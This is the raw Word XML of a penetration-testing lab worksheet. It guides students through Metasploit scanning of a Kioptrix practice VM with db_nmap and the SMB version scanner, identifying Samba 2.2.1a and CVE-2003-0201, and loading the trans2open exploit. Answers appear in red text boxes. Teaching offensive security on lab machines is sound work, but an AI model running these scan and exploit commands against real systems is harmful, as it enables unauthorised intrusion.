                            <w:r w:rsidR="00AB450F" w:rsidRPr="00B37FB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 xml:space="preserve"> kali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49D09" id="Rectangle 2" o:spid="_x0000_s1028" style="position:absolute;margin-left:276pt;margin-top:23.25pt;width:234.75pt;height:8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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1FDBC1E6" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRPr="00B37FBD" w:rsidRDefault="00FF567C" w:rsidP="00B37FBD">
                      <w:pPr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r w:rsidRPr="00B37FB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192.168.1</w:t>
                      </w:r>
                      <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B37FB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.134</w:t>
                      </w:r>
                      <w:r w:rsidR="00AB450F" w:rsidRPr="00B37FB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 xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00AB450F" w:rsidRPr="00B37FB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kiop</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00B37FBD">
                        <w:rPr>
                          <w:rFonts w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
                          <w:color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>192.168.1</w:t>
                      </w:r>
                      <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00.???</w:t>
                      </w:r>
                      <w:r w:rsidR="00AB450F" w:rsidRPr="00B37FB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 xml:space="preserve"> kali</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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F53E86" w:rsidRPr="00F53E86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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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F53E86" w:rsidRPr="00F53E86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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command.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Let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simple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scan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6F011D81" w14:textId="77777777" w:rsidR="00F53E86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db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00C021FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00524118">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00</w:t>
      </w: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.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5C86A" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C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5C76495F" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C" w:rsidP="00F53E86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</w:pPr>
      <w:r w:rsidRPr="00FF567C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>What IPs are responding?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9AA90" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRPr="003157E9" w:rsidRDefault="00FF567C" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="003157E9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 xml:space="preserve">Ignore the .1, .2 and .254 addresses </w:t>
      </w:r>
      <w:r w:rsidRPr="003157E9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br/>
        <w:t>– these are part of the VMWare network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F41231D" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="009E0E6A" w:rsidRDefault="009E0E6A" w:rsidP="00F53E86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D0CF1" wp14:editId="06865976">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3364992</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>22022</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2981325" cy="431597"/>
                <wp:effectExtent l="0" t="0" r="2857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31597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29A88" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00B37FBD" w:rsidRDefault="009E0E6A" w:rsidP="00B37FBD">
                            <w:pP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r w:rsidRPr="00B37FB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192.168.1</w:t>
                            </w:r>
                            <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B37FB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.134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D0CF1" id="Rectangle 3" o:spid="_x0000_s1029" style="position:absolute;margin-left:264.95pt;margin-top:1.75pt;width:234.75pt;height:3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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3FF29A88" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00B37FBD" w:rsidRDefault="009E0E6A" w:rsidP="00B37FBD">
                      <w:pPr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r w:rsidRPr="00B37FB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192.168.1</w:t>
                      </w:r>
                      <w:r w:rsidR="00524118" w:rsidRPr="00B37FB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00</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B37FB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.134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>Wh</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0E6A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 xml:space="preserve">at is the IP of the </w:t>
      </w:r>
      <w:r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br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E0E6A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>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E0E6A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 xml:space="preserve"> VM? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ECF057" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C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Try these again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD2D84" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C" w:rsidP="00FF567C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hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66582114" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C" w:rsidP="00FF567C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services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9ED7B" w14:textId="77777777" w:rsidR="00FF567C" w:rsidRDefault="00FF567C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58187321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systems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nothing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3D05A4F6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registered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that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C964165" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="003157E9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</w:pPr>
      <w:r w:rsidRPr="003157E9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 xml:space="preserve">Since </w:t>
      </w:r>
      <w:r w:rsidR="0059437A" w:rsidRPr="003157E9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>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003157E9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 xml:space="preserve"> is primarily used to exploit services, it is preferred that it only stores systems that have services running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5772DE" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="001D0D0F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en-AU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DE8ACF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 6) Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E0E6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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to check which devices are available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18801113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Since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only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looks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potentially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systems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don’t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have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available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examine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won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added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database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BD2B5" w14:textId="77777777" w:rsidR="00276483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3A6F2433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proofErr w:type="spellStart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db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF567C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proofErr w:type="spellEnd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192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00524118">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00</w:t>
      </w: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.0/24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check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services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.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Since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have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are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entries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database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC8614" w14:textId="77777777" w:rsidR="00624674" w:rsidRDefault="00BB2C7D" w:rsidP="00BB2C7D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22CA86" wp14:editId="30C05B89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3364992</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>24663</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2981325" cy="921716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21716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C223B" w14:textId="77777777" w:rsidR="00BB2C7D" w:rsidRPr="00B37FBD" w:rsidRDefault="00BB2C7D" w:rsidP="00BB2C7D">
                            <w:pP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22, 80, 111, 139*, 443,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2CA86" id="Rectangle 8" o:spid="_x0000_s1030" style="position:absolute;margin-left:264.95pt;margin-top:1.95pt;width:234.75pt;height:7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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18BC223B" w14:textId="77777777" w:rsidR="00BB2C7D" w:rsidRPr="00B37FBD" w:rsidRDefault="00BB2C7D" w:rsidP="00BB2C7D">
                      <w:pPr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color w:val="FF0000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>22, 80, 111, 139*, 443, 1024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>Which</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0E6A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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r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 xml:space="preserve">TCP ports are running </w:t>
      </w:r>
      <w:r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br/>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0E6A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 xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E0E6A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>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E0E6A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 xml:space="preserve"> VM? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45408708" w14:textId="77777777" w:rsidR="00BB2C7D" w:rsidRPr="009E0E6A" w:rsidRDefault="00624674" w:rsidP="00BB2C7D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 xml:space="preserve">Which is the </w:t>
      </w:r>
      <w:r w:rsidR="00BB2C7D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 xml:space="preserve">samba </w:t>
      </w:r>
      <w:r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br/>
      </w:r>
      <w:r w:rsidR="00BB2C7D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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB2C7D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>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB2C7D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>) port?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789089C" w14:textId="77777777" w:rsidR="00BB2C7D" w:rsidRDefault="00BB2C7D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3F1C262F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7) Load the samba service scanner</w:t>
      </w:r>
      <w:r w:rsidR="001D0D0F" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1A6ED" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00F53E86" w:rsidRDefault="0059437A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comes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scanners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almost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any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service.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lab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are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going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focus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samba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scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DA160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“search”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objects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s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search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look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like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following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44449A18" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00276483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earch scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16D869BB" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00B57908" w:rsidRDefault="009E0E6A" w:rsidP="00F53E86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</w:pPr>
      <w:r w:rsidRPr="00B57908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>What result contains the samba version scanner?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075CEAB4" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRDefault="009E0E6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45D20" wp14:editId="16F583F9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2487168</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>57531</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3275457" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="2032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57" cy="4572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DA934" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00BB2C7D" w:rsidRDefault="009E0E6A" w:rsidP="009E0E6A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r w:rsidRPr="00BB2C7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auxiliary/scanner/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00BB2C7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smb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00BB2C7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BB2C7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smb_version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45D20" id="Rectangle 4" o:spid="_x0000_s1031" style="position:absolute;margin-left:195.85pt;margin-top:4.55pt;width:257.9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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="53EDA934" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00BB2C7D" w:rsidRDefault="009E0E6A" w:rsidP="009E0E6A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r w:rsidRPr="00BB2C7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auxiliary/scanner/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00BB2C7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smb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00BB2C7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/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00BB2C7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smb_version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A49E9C" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRDefault="009E0E6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50658862" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="00276483" w:rsidRDefault="009E0E6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622DFCE7" w14:textId="77777777" w:rsidR="00A644B7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version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scanner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been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found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loaded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  <w:r w:rsidR="00A644B7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194C19F0" w14:textId="77777777" w:rsidR="009E0E6A" w:rsidRPr="009E0E6A" w:rsidRDefault="00276483" w:rsidP="009E0E6A">
      <w:pPr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u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se </w:t>
      </w:r>
      <w:r w:rsidR="009E0E6A" w:rsidRPr="009E0E6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auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E0E6A" w:rsidRPr="009E0E6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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E0E6A" w:rsidRPr="009E0E6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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E0E6A" w:rsidRPr="009E0E6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smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="178BD4DF" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00276483" w:rsidRDefault="001D0D0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6A7229D4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8) Configure and run the scanner</w:t>
      </w:r>
      <w:r w:rsidR="00276483" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB9A69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Nmap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should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have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detected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two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hosts,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Kioptrix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other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vmware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service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F734E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Figure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which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address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Kioptrix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remote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host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shown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below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219743EA" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483" w:rsidRDefault="009E0E6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et RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="009E3E0E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E3E0E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E3E0E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IP</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009E3E0E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="003157E9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 </w:t>
      </w:r>
      <w:r w:rsidR="003157E9" w:rsidRPr="00063E32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>/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003157E9" w:rsidRPr="00063E32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>/note RHOST</w:t>
      </w:r>
      <w:r w:rsidR="003157E9" w:rsidRPr="00063E32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u w:val="single"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431533E9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configured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1F754B90" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483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show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E08596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check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available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options.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4D71C720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Nothing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needs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changed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20F0E560" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C6A0B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initiate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scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CFD7E" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRDefault="00BB2C7D" w:rsidP="00F53E86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497C9" wp14:editId="6DCFD9ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>3050133</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9576</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3209620" cy="381000"/>
                <wp:effectExtent l="0" t="0" r="101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620" cy="3810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4F74D" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00BB2C7D" w:rsidRDefault="00B57908" w:rsidP="00B57908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r w:rsidRPr="00BB2C7D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Unix Samba 2.2.1a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497C9" id="Rectangle 6" o:spid="_x0000_s1032" style="position:absolute;margin-left:240.15pt;margin-top:.75pt;width:25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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="74D4F74D" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00BB2C7D" w:rsidRDefault="00B57908" w:rsidP="00B57908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r w:rsidRPr="00BB2C7D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Unix Samba 2.2.1a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7908" w:rsidRPr="00B57908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 xml:space="preserve">What version of Samba is </w:t>
      </w:r>
      <w:r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br/>
      </w:r>
      <w:r w:rsidR="00B57908" w:rsidRPr="00B57908"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  <w:t>running?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B587EB" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00B57908" w:rsidRDefault="00B57908" w:rsidP="00F53E86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</w:pPr>
    </w:p>
    <w:p w14:paraId="132BFE3E" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00F53E86" w:rsidRDefault="00B57908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19C54906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9) Check the database for the information</w:t>
      </w:r>
      <w:r w:rsidR="001D0D0F" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F1D02" w14:textId="77777777" w:rsidR="00B57908" w:rsidRDefault="00B57908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4D58A78C" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00B57908" w:rsidRDefault="00B57908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B57908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services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D208D2F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updated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version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samba.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B57908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Search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Google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BB2C7D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(on the host) </w:t>
      </w:r>
      <w:r w:rsidR="00B57908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version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B57908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and </w:t>
      </w:r>
      <w:r w:rsidR="008E323D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find a highly-rated </w:t>
      </w:r>
      <w:r w:rsidR="00B57908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“CVE”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reveal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released.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important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later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  <w:r w:rsidR="00B57908" w:rsidRPr="00B57908"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5306C" w14:textId="77777777" w:rsidR="00B57908" w:rsidRDefault="00B57908" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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8461E" wp14:editId="3ED6D1D4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2728570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3034055" cy="381000"/>
                <wp:effectExtent l="0" t="0" r="139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055" cy="3810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5CB7" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00BB2C7D" w:rsidRDefault="0089707F" w:rsidP="00B57908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hyperlink r:id="rId6" w:history="1">
                              <w:r w:rsidR="00B57908" w:rsidRPr="00BB2C7D">
                                <w:rPr>
                                  <w:rFonts w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
                                  <w:color w:val="FF0000"/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t>CVE-2003-0201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8461E" id="Rectangle 7" o:spid="_x0000_s1033" style="position:absolute;margin-left:214.85pt;margin-top:.9pt;width:238.9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" filled="f" strokecolor="black [3213]" strokeweight="1.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="53A65CB7" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00BB2C7D" w:rsidRDefault="0089707F" w:rsidP="00B57908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hyperlink r:id="rId7" w:history="1">
                        <w:r w:rsidR="00B57908" w:rsidRPr="00BB2C7D">
                          <w:rPr>
                            <w:rFonts w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="28"/>
                          </w:rPr>
                          <w:t>CVE-2003-0201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AF6BBD" w14:textId="77777777" w:rsidR="00B57908" w:rsidRDefault="00B57908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01C4F699" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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7C350340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10) Run a samba exploit against the service</w:t>
      </w:r>
      <w:r w:rsidR="001D0D0F" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CAACE2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constructed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from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know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about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host.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old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version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samba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Linux.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Since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 w:rsidR="003157E9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old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version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samba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it’s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possible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attack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avenue</w:t>
      </w:r>
      <w:r w:rsidR="008E323D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3257239B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Searching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samba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reveals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some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</w:p>
    <w:p w14:paraId="53FDD26A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used.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search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function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look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like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this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E15EE" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483" w:rsidRDefault="00276483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earch exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C3B1B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276483">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>trans2open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viable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</w:t>
      </w:r>
      <w:r w:rsidR="00B57908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(same year as CVE)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let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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39144703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Load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options.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59F50D83" w14:textId="77777777" w:rsidR="00B57908" w:rsidRDefault="00174DE7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use</w:t>
      </w:r>
      <w:r w:rsidR="00B57908" w:rsidRPr="00B57908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exploit</w:t>
      </w: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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B57908" w:rsidRPr="00B57908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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B57908" w:rsidRPr="00B57908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/samba</w:t>
      </w:r>
      <w:r w:rsidR="00743532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</w:t>
      </w:r>
      <w:r w:rsidR="00B57908" w:rsidRPr="00B57908">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>trans2open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914491C" w14:textId="77777777" w:rsidR="00BB5AFE" w:rsidRPr="00BB5AFE" w:rsidRDefault="003157E9" w:rsidP="00F53E86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i/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>prompt should be:</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB5AFE"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>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB5AFE"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 xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidR="00BB5AFE" w:rsidRPr="008E323D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="black"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>trans2open</w:t>
      </w:r>
      <w:r w:rsidR="00BB5AFE"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>) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A458DF1" w14:textId="77777777" w:rsidR="00B57908" w:rsidRPr="00743532" w:rsidRDefault="00743532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743532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show options</w:t>
      </w:r>
    </w:p>
